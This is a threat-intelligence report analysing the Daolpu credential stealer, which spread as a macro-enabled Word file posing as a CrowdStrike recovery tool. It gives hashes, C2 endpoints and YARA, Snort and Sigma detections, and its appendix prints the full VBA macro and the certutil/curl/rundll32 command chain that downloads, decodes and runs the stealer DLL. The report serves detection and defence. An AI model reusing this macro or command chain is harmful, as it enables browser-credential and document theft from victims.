While we all stand in unity with cyber and IT teams who have been working tirelessly to restore systems following last week’s CrowdStrike patch failure, cyber criminals continue to exploit the situation by launching phishing campaigns.
Discovered on July 24th, 2024, the latest malware on the list is: Daolpu. A Word document containing macros that download an unidentified stealer now tracked as Daolpu.
Macroviruses exploit the macro scripting capabilities of office applications like Microsoft Word and Excel to embed malicious code within document files. These viruses spread rapidly through email attachments and shared documents, making them a persistent threat in various environments. This paper provides a detailed technical analysis of macrovirus evolution, infection mechanisms, and current detection and mitigation strategies. The current malware sample exploits the opportunity presented by a recent CrowdStrike outage to deliver its payload using a weaponized Word document. By leveraging this context, attackers might exploit the surge in attempts to repair the issue and the appearance of legitimacy to perform their attack. Once opened, the weaponized document downloads and executes a stealer.
TEHTRIS Threat Intel team exposes in this report the mechanisms of Daolpu Stealer in depth.
Analyst opinion
The sample lacks obfuscation and evasion techniques, likely due to the short window of opportunity created by the recent CrowdStrike outage. It is estimated that the development of this tool took less than two days, suggesting that the malware was hastily crafted specifically to exploit this temporary vulnerability. This rapid development cycle indicates a targeted approach, focusing on immediate deployment rather than long‑term stealth and persistence. Consequently, the malware’s straightforward design highlights its purpose‑built nature for this particular attack scenario.
In the following section, we will provide a detailed examination of each malicious file involved in the attack. This analysis includes file names, hashes, sizes, and other relevant attributes.
Table 1: “New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm”
Type | Value |
File Type | Microsoft Word 2007+ |
DateTimestamp | N/A |
SIZE | 303K |
MD5 | dd2100dfa067caae416b885637adc4ef |
SHA256 | 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 |
Table 2: “ThisDocument.cls”
Type | Value |
File Type | SCII text, with very long lines (470) |
DateTimestamp | N/A |
SIZE | 17K |
MD5 | cc7c247c00295665aed802b30f1793c |
SHA256 | 6d3f611353c7fc8aa65b48b3bc054682aad6b2d7c1321f4fb1b6ed98bb88aa9d |
Table 3: “”
Type | Value |
File Type | PEM certificate |
DateTimestamp | N/A |
SIZE | 1.9M |
MD5 | d67ea3b362d4e9b633216e85ac643d1f |
SHA256 | 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 |
Table 4: “mscorsvc.dll”
Type | Value |
File Type | PE32+ executable (DLL) (GUI) x86‑64, for MS Windows, 7 sections |
DateTimestamp | 2024‑07‑19 08:10:10 |
SIZE | 1.4M |
MD5 | eb29329de4937b34f218665da57bcef4 |
SHA256 | 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a |
The following schema provides a detailed illustration of the infection chain with Mitre technics associated, offering a step‑by‑step breakdown of how the attack unfolds to clarify the interactions and dependencies between the various components previously listed.

Code details
The script of the macrovirus has been fully extracted and can be found in appendices.
The executable has been compiled using Visual Studio 2019 (version14.39/33519) with debug symbols stripped, resulting in a Program Database (PDB) file. Despite the removal of debug symbols, the PDB file contains metadata that can be leveraged to detect the malware (c.f. the yara section).

The next picture details the MITRE ATT&CK techniques utilized by the malware sample and each of its components (Phishing, User Execution, Deobfuscate/Decode Files or Information, Automated Collection, Data from Local System, Ingress Tool Transfer, Non‑Standard Port, Web Service, Automated Exfiltration, Exfiltration Over Web Service, Financial Theft, Phishing, User Execution, Deobfuscate/Decode Files or Information, Automated Collection, Data from Local System, Ingress Tool Transfer, NonStandard Port, Web Service, Automated Exfiltration, Exfiltration Over Web Service, Financial Theft)

The next schema illustrates the STIX2 representation of the attack, providing a structured and standardized format for describing the incident. The raw JSON data is available in the appendices.

Initial execution
The initial payload is a DOCM file, spread through a phishing campaign. For the CrowdStrike fix to be relevant, it must target relatively large companies, as these organizations typically have antispam countermeasures in place that should block such threats. The attackers likely aimed at exploiting the temporary lapse in security to bypass these defenses and deliver their payload. The number of potential victims should be low.
The macro is executed by the script This Document.cls:Document_Open at the opening of the document. By default, the user must enable macro execution in word; when it’s done the malicious payload is executed without additional user interaction.
The next screenshot is from the TEHTRIS sandbox, captured immediately after the infection. This image highlights the initial impact of the malware, while subsequent execution phases occur in the background. This provides an early glimpse into the malware’s behavior before it fully executes its payload.

Sensitive data
Because the malware is a stealer, its sole goal is to collect and exfiltrate data. It focuses on gathering sensitive information from the infected system and transmitting it to the attacker’s server, ensuring that the stolen data can be used for malicious purposes such as identity theft or financial fraud.
The malware automatically exfiltrates credentials from the following browsers: Mozilla Firefox, Microsoft Edge, Google Chrome, and Coc Coc Browser. The inclusion of Coc Coc Browser, which is popular in Vietnam, may indicate that the campaign specifically targets Vietnamese entities.

The malware also crawls the disk seeking sensitive documents, exfiltrating every file that matches the following extensions: .doc, .docx, .xls, .xlsx, .pdf, .txt, .ppt, and .pptx. By targeting these common document formats, the malware aims to gather a wide range of potentially valuable and sensitive information.

The malware extracts passwords and sensitive data from the previously cited browsers. This sensitive information is collected into a file prior to its exfiltration, ensuring that all gathered credentials and personal data are consolidated and ready for transmission to the attacker’s server.

To collect Firefox credentials, the malware uses the mozglue library to parse the Firefox configuration. This allows the malware to efficiently access and extract stored login information and other sensitive data from the browser’s internal files.

The exfiltration is performed automatically over an HTTP channel using multipart POST uploads. The lack of encryption suggests that the malware was developed in a hurry, as it does not implement basic security measures to protect the transferred data, making it more vulnerable to interception and analysis.

Command and control
The Command and Control (C2) server is hosted by Linode LLC, a cloud provider. The attacker likely purchased a Virtual Private Server (VPS) from Linode to conduct their attack.

To uniquely identify the victim, the malware uses the MAC address as part of the host fingerprint. This approach ensures that each infected system can be individually tracked based on its network hardware address.

The C2 server was down at the time of the analysis.
No commands are exchanged with the C2; the sensitive information is sent in a one‑way stream from the stealer to the C2 server. This means that the malware simply transmits collected data without receiving any instructions or updates from the attacker.
No cryptographic mechanisms have been implemented in the sample.
- http://172 [dot] 104.160.126:8099/payload2.txt
- http://172 [dot] 104.160.126:5000/Uploadss
Files and registry
C:\Windows\Temp\login data
C:\Windows\Temp\Login Data

Subcommands are not capturing stout and stderr and may leak information (lazy system invokation):
Similar samples
Other samples of the same malware have been spotted in our intelligence database. Here are the SHA‑256 hashes of these samples:
- 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a
- 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8
- f0fce67c1f360d045c21249f6faaac4d64b36aad02c8b877ab7db1e35f7c71f5
We did not manage to yara sign the macrovirus. A snort and sigma will evently spot them.
import "pe"
rule DaolpuStealer {
author = "PEZIER Pierre-Henri. Copyright TEHTRIS 2024"
$str_01 = "\\Temp\\result.txt" fullword
$str_02 = "docx" wide fullword
$str_03 = "xlsx" wide fullword
$str_04 = "doc" wide fullword
$str_05 = "xls" wide fullword
$str_06 = "ppt" wide fullword
$str_07 = "pptx" wide fullword
$str_08 = "pdf" wide fullword
$str_09 = "txt" wide fullword
pe.is_pe and
pe.pdb_path matches /Mal_Cookie.*mscorsvc.pdb$/
or all of ($str*)
The macrovirus and stealer implant will be detected easily by the following rules:
alert http any any -> any any (\
sid: 110000002;\
msg: "Download certificate encoded PE Executable";\
metadata: author PEZIER Pierre-Henri. Copyright TEHTRIS 2024;\
content: "-----BEGIN CERTIFICATE-----"; startswith; isdataat:0, relative;\
content: "TVqQ"; within: 10;\
classtype: file-format;\
rev: 1;
alert http any any -> any any (\
sid: 110000003;\
msg: "Daolpu stealer";\
metadata: author PEZIER Pierre-Henri. Copyright TEHTRIS 2024;\
content:"POST"; http_method; http.uri; content:"/Uploadss";\
classtype: file-format;\
rev: 1;
The following sigma detects the DLL behavior.
title: Daolpu stealer
id: 008ee86c-ea30-4cb9-a1cf-d8f733e8502d
description: Daolpu stealer
author: TEHTRIS - Pezier Pierre-Henri
date: 2024/07/24
- detection.threat_hunting
category: file_access
product: windows
- Image|endswith: ''\rundll32.exe'
- TargetFileName: 'C:\Windows\Temp\result.txt'
- TargetFileName: 'C:\Windows\Temp\Login Data'
- TargetFileName: 'C:\Windows\Temp\cookies.sqlite'
- TargetFileName: 'C:\Windows\Temp\cookies.sqlite-wal'
- TargetFileName: 'C:\Windows\Temp\cookies.sqlite-shm'
condition: results_file and source_process
- Unknown
level: critica
Office document macro
Source code of ThisDocument.cls:
xcopy C:\Windows\System32\curl.exe C:\Users\admin\AppData\Local\Temp
certutil -f -encode C:\Users\admin\AppData\Local\Temp\curl.exe C:\Users \admin\AppData\Local\Temp\curl.txt
certutil -f -decode C:\Users\admin\AppData\Local\Temp\curl.txt C:\Users \admin\AppData\Local\Temp\curl.exe
C:\Users\admin\AppData\Local\Temp\curl.exe payload2.txt -o C:\Users\admin\AppData\Local\Temp\mscorsvc.txt
certutil -f -decode C:\Users\admin\AppData\Local\Temp\mscorsvc.txt C:\ Users\admin\AppData\Local\Temp\mscorsvc.dll
del C:\Users\admin\AppData\Local\Temp\curl.exe
del C:\Users\admin\AppData\Local\Temp\curl.txt
del C:\Users\admin\AppData\Local\Temp\curl.exe
del C:\Users\admin\AppData\Local\Temp\mscorsvc.txt
START " " rundll32 C:\Users\admin\AppData\Local\Temp\mscorsvc.dll, DllMain
Commands run by macro
' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
' Sub ChangeText()
' ActiveDocument.Words(19).Text = "The "
' End Sub
Sub DeleteText()
' Dim rngFirstParagraph As Range
' Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
' With rngFirstParagraph
' .Delete
' .InsertAfter Text:="New text"
' .InsertParagraphAfter
' End With
Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
With rngFirstParagraph
.InsertAfter Text:="Fourth paragraph displayed " + Chr(34)
End With
Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range
With rngFirstParagraph
.InsertAfter Text:="Fifth paragraph displayed"
End With
Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range
With rngFirstParagraph
.InsertAfter Text:="Sixth paragraph displayed"
End With
Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range
With rngFirstParagraph
.InsertAfter Text:="Seventh paragraph displayed"
End With
For i = 1 To ActiveDocument.Paragraphs.Count
' ActiveDocument.Paragraphs(i).Style = wdStyleNormal
Set myRange = ActiveDocument.Paragraphs(i).Range
With myRange.Font
' .Bold = True
.Name = "Times New Roman"
.Size = 14
End With
Next i
End Sub
Sub ShowErrorText()
Dim rngFirstParagraph As Range
Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range
With rngFirstParagraph
.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
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" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
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" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
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" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3)
.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
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" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + _
" " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3)
End With
End Sub
'Show msgbox
Sub MsgFunc()
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
Msg = "The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?" ' Define message.
Style = vbYesNo Or vbCritical Or vbDefaultButton2 ' Define buttons.
Title = "Missing font" ' Define title.
Help = "DEMO.HLP" ' Define Help file.
Ctxt = 1000 ' Define topic context.
' Display message.
Response = MsgBox(Msg, Style, Title, Help, Ctxt)
If Response = vbYes Then ' User chose Yes.
MyString = "Yes" ' Perform some action.
Else ' User chose No.
MyString = "No" ' Perform some action.
End If
End Sub
Sub MainFunc()
Dim curl_enc_txt_path As String
Dim curl_dec_exe_path As String
Dim mal_enc_txt_url As String
Dim mal_enc_txt_path As String
Dim mal_dec_exe_path As String
Dim pp As String
Dim cc As String
Dim dir As String
Dim host As String
dir = ActiveDocument.Path
dir = Environ("temp")
host = ""
curl_enc_txt_path = dir + "\curl.txt"
curl_dec_exe_path = dir + "\curl.exe"
mal_enc_txt_url = host + "/payload2.txt"
mal_enc_txt_path = dir + "\mscorsvc.txt"
mal_dec_exe_path = dir + "\mscorsvc.dll"
pp = pp + "C:\Windows\Sys"
pp = pp + "tem32\cmd.exe /c "
cc = cc + curl_enc_txt_path + curl_dec_exe_path
pp = pp + "xcopy C:\Windows\Sys"
cc = cc + curl_enc_txt_path + mal_enc_txt_url
pp = pp + "tem32\cu" + "rl.exe " + dir + " & "
cc = cc + mal_enc_txt_path + mal_enc_txt_url
pp = pp + "certutil -f "
cc = cc + mal_enc_txt_path + mal_dec_exe_path
pp = pp + "-encode " + dir + "\cu" + "rl.exe " + curl_enc_txt_path + " & "
cc = cc + pp + mal_dec_exe_path
pp = pp + "certutil -f "
cc = cc + pp + dir
pp = pp + "-decode " + curl_enc_txt_path + " " + curl_dec_exe_path + " & "
cc = cc + curl_enc_txt_path + dir
pp = pp + curl_dec_exe_path + " " + mal_enc_txt_url + " -o " + mal_enc_txt_path + " & "
cc = cc + curl_enc_txt_path + dir
pp = pp + "certutil -f "
cc = cc + curl_enc_txt_path + curl_dec_exe_path
pp = pp + "-decode " + mal_enc_txt_path + " " + mal_dec_exe_path + " & "
cc = cc + mal_enc_txt_url + curl_dec_exe_path
pp = pp + "del " + dir + "\cu" + "rl.exe & "
cc = cc + host + pp + curl_enc_txt_path
pp = pp + "del " + curl_enc_txt_path + " & "
cc = cc + curl_enc_txt_path + dir
pp = pp + "del " + curl_dec_exe_path + " & "
cc = cc + curl_dec_exe_path + pp
pp = pp + "del " + mal_enc_txt_path + " & "
cc = cc + mal_enc_txt_path + pp
Dim vbDblQuote As String
vbDblQuote = Chr(34)
pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
cc = cc + mal_dec_exe_path + pp
pp = pp + "exit"
cc = cc + dir + pp
'pp = pp + "cmd.exe -d & exit"
'cc = cc + mal_enc_txt_url + curl_dec_exe_path
' Shell (pp), vbHidden
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run pp, 0, False
End Sub
Sub Document_Open()
End Su
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